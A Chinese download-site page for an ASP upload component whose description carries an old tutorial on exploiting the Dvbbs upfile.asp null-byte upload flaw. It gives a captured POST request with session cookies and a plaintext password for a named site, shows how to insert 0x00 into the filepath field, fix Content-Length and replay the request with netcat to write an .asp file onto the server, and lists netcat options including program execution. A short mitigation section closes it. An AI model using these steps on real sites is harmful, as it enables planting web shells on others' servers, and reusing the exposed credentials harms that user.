下载 > 资源分类 >  开发技术 >  C# > 先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004

先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004

2005-12-08 上传大小:40KB
上传漏洞终结篇 


一、写在前面
***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***
NC(Netcat)
  用于提交数据包
  DOS界面下运行:
  NC -vv www.***.com 80<1.txt
  -vv: 回显
  80: www端口
  1.txt: 就是你要发送的数据包
 (更多使用方法请查看本区的帖子) 
WS
E(WSockExpert)
  对本机端口的监视,抓取IE提交的数据包
 (不会用的就自己到网上搜资料N多)

二、漏洞原理
下面例子假设的前提
www主机: www.***.com;
bbs路径 : /bbs/
漏洞源于对动网上传文件的研究,建议有一定编程经验的
看看Dvbbs的upfile.asp文件,没有必要全部看懂
upfile是通过生成一个form表上传,如下
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadFace">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="上传" ...></form>
用到的变量:
filepath 默认值uploadface 属性hiden
act   默认值upload   属性hiden
file1  就是你要传的那个文件
关键是 filepath 这个变量!
默认情况下我们的文件上传到www.***.com/bbs/uploadface/
文件是用你的上传时间命名的,就是upfile里的这一句
FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt
-------------------------------------------------------------------------
我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道
char data[]="bbs"
这个data数组长度是4: b b s \0
如果我们构造filepath如下,会怎么样呢?
filepath="/newmm.asp\0"
我们在2004.09.24.08.24传的文件就会发生变化
没有改时:
http://www.***.com/bbs/uploadface/200409240824.jpg
用我们构造的filepath时:
http://www.***.com/newmm.asp\0/200409240824.jpg
这样当服务器接收filepath数据时,检测到newmm.asp后面的\0
就理解为filepath的数据就结束了
这样我们上传的文件,比如c:\1.asp
就保存成: http://www.***.com/newmm.asp

三、后期补充
漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行
有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个
上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。
而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具
自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。
就算他加N个hiden变量也于事无补。
当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结
就是我们的新理论诞生的时候!

四、漏洞列表
http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746

监听外部主机
    NC [-options] hostname port[s] [ports] ...
监听本地主机
    NC -l -p port [options] [hostname] [port]
options:
    -d       detach from console, stealth mode
    -e prog     inbound program to exec [dangerous!!]
    -g gateway   source-routing hop point[s], up to 8
    -G num     source-routing pointer: 4, 8, 12, ...
    -h       this cruft
    -i secs     delay interval for lines sent, ports scanned
    -l       listen mode, for inbound connects
    -L       listen harder, re-listen on socket close
    -n       numeric-only IP addresses, no DNS
    -o file     hex dump of traffic
    -p port     local port number
    -r       randomize local and remote ports
    -s addr     local source address
    -t       answer TELNET negotiation
    -u       UDP mode
    -v       verbose [use twice to be more verbose]
    -w secs     timeout for connects and final net reads
    -z       zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]


详细实例:
---------------------------------------------------------------------------------
一、WSE抓包结果(存到1.txt里):
POST /bbs/upPhoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upPhoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84

-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

../medias/myPhoto/
-----------------------------7d423a138d0278
... ...

上传
-----------------------------7d423a138d0278--
---------------------------------------------------------------------------------
二、UltraEdit打开1.txt改数据:
......
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

/newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了
......

---------------------------------------------------------------------------------
三、重新计算cookies长度,然后nc提交

Nc -vv www.xin126.com 80 <1.txt

UltraEdit是一个16位编辑器网上可以下载得到
我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H
其实你改的时候就直接再filepath的结尾处加个00就OK了

计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了
......
Host: www.xin126.com
Content-Length: 1969 <======就是这个
Connection: Keep-Alive
Cache-Control: no-cache
......
计算会吧?一个字母、数字就是1


对于上传漏洞提出的解决思路:(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理
===>我们的对策就是把filepath变成常量。。。
这个方法是目前最有效的(我认为的) 

2、加强对于\0的处理,原来我们是读到这里就结束
我们继续读直道下一个变量开始的地方,处理就OK了
...展开收缩
综合评分:4.1(116位用户评分)
开通VIP C币充值 立即下载

评论共有9条

name
jumpwater2016-07-13 20:01:22
文件上传可以用,上传到数据库用不了,数据库损坏了。
name
hsawu2015-03-21 14:53:16
没有漏洞那 可以用
name
phz9452014-10-28 23:08:15
实测 可以用的
name
lover662014-10-28 10:55:47
写代码要用的
name
savage_dd2014-10-04 22:18:29
恩,下了,相当不错得资源
name
mirbruce2013-06-20 23:23:26
不错,Session 判断身份最安全。
name
zwxyal30112013-02-24 17:49:51
好用。不过,我的问题依旧。还是感谢楼主分享
name
lvxin1232013-01-08 14:17:18
恩,可以用,谢谢
name
emptykm2012-12-17 23:22:23
写代码要用的,没有漏洞当然是最好的

评论资源

您不能发表评论,可能是以下原因:

登录后才能评论

待评论资源
 

热门专辑

开发技术热门标签

VIP会员动态

关闭
img

spring mvc+mybatis+mysql+maven+bootstrap 整合实现增删查改简单实例.zip

资源所需积分/C币 当前拥有积分 当前拥有C币
5 0 0
为了良好体验,不建议使用迅雷下载
确认下载
img

先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004

会员到期时间: 剩余下载个数: 剩余C币:593 剩余积分:0
为了良好体验,不建议使用迅雷下载
VIP下载
您今日下载次数已达上限(为了良好下载体验及使用,每位用户24小时之内最多可下载20个资源)

积分不足!

资源所需积分/C币 当前拥有积分
您可以选择
开通VIP
4000万
程序员的必选
600万
绿色安全资源
现在开通
立省522元
或者
购买C币兑换积分 C币抽奖
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
(仅够下载10个资源)
为了良好体验,不建议使用迅雷下载
确认下载
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 0 0
为了良好体验,不建议使用迅雷下载
C币充值 开通VIP
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
您的积分不足,将扣除 10 C币
为了良好体验,不建议使用迅雷下载
确认下载
下载

兑换成功

你当前的下载分为234开始下载资源
你还不是VIP会员
开通VIP会员权限,免积分下载
立即开通

你下载资源过于频繁,请输入验证码

您因违反CSDN下载频道规则而被锁定帐户,如有疑问,请联络:webmaster@csdn.net!

举报

若举报审核通过,可奖励20下载分

  • 举报人:
  • 被举报人:
  • 举报的资源分:
  • *类型:
  • *详细原因: